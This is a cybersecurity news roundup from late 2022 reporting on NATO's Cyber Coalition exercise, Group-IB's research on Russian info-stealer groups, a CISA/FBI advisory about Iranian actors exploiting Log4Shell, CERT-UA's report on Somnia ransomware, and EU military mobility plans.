NATO held annual cyber defence exercise

Between 28 November and 2 December 2022, NATO held its Cyber Coalition 2022 cyber defence exercise with the goal of boosting member countries’ cyber resilience.

The exercise involved 1000 cyber defenders from 26 NATO allies, Finland, Sweden, Georgia, Ireland, Japan, Switzerland, and the EU, as well as experts from business and academia.

Cyber Coalition 2022 was used to test and validate concepts, capture requirements, or explore disruptive technologies, in support of military operators and commanders. It included experiments on the use of artificial intelligence to help counter cyber threats, on the standardisation of cyber messages to foster information sharing, and on the exploitation of cyber threat intelligence to inform cyberspace situational awareness. 

Singapore-based Group-IB identified 34 Russian cybercrime groups

The Singapore-based research team, Group-IB, has identified 34 Russian cybercrime groups responsible for distributing info-stealing malware under the stealer-as-a-service model. The cybercriminals use this type of malware to target users of Steam, Roblox, and Amazon in 111 countries, obtaining user credentials stored in browsers, bank card details, and crypto wallet information from infected computers and selling them on the dark web. Group-IB estimates that more than 890,000 devices in 111 countries in the first seven months of 2022 have been infected. The five most attacked countries are the USA, Brazil, India, Germany, and Indonesia, while the estimated value of stolen credentials is around $5.8 million.

CISA and FBI issue joint advisory on Iranian government-sponsored APT actors compromising federal network

In the USA, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigations (FBI) have issued a cybersecurity advisory regarding an incident at a Federal Civilian Executive Branch (FCEB). Having assessed that the FCEB network was compromised by Iranian government-sponsored advanced persistent threat (APT) actors, the two entities provided details on the actors’ tactics, techniques, and procedures. One of the findings was that the cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server. As such, organisations with affected VMware systems that did not immediately apply available patches or workarounds were advised toto assume compromise and initiate threat-hunting activities.

New Somnia ransomware attacks target corporations in Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) reported the spread of a new ransomware strain called ‘Somnia’, attributing the attacks to the Russian threat actor known as ‘From Russia with Love’ (FRwL), also known as ‘Z-Team’. The ransomware attacks targeted Ukrainian corporations’ employees, using their Telegram accounts to try and gain access to a corporate network.

As explained by CERT-UA, the group used fake sites that mimic the ‘Advanced IP Scanner’ software, which, if downloaded, infects the victim’s computer with the Vidar data-stealing malware that can capture Telegram session data, as well as take over the victim’s account.

Then, the threat actors used victims’ Telegram accounts to gain access to the corporate network. Once access to the target’s network was obtained, the hackers executed reconnaissance operations using tools like Netscan and deployed Cobalt Strike Beacons before exfiltrating data.

According to CERT-UA, the group had previously revealed that they created Somnia ransomware on Telegram and posted evidence of the attacks they made against Ukrainian targets.

EU proposed actions to boost its cyber capabilities

The European Union has recently proposed a set of measures to help its armies move faster in times of conflict. The proposal aims to holistically strengthen the European infrastructure, focusing on cyberattacks and the protection of critical infrastructure, as well. The Action Plan on Military Mobility will help European armed forces to better respond to crises erupting at the EU’s external borders and beyond.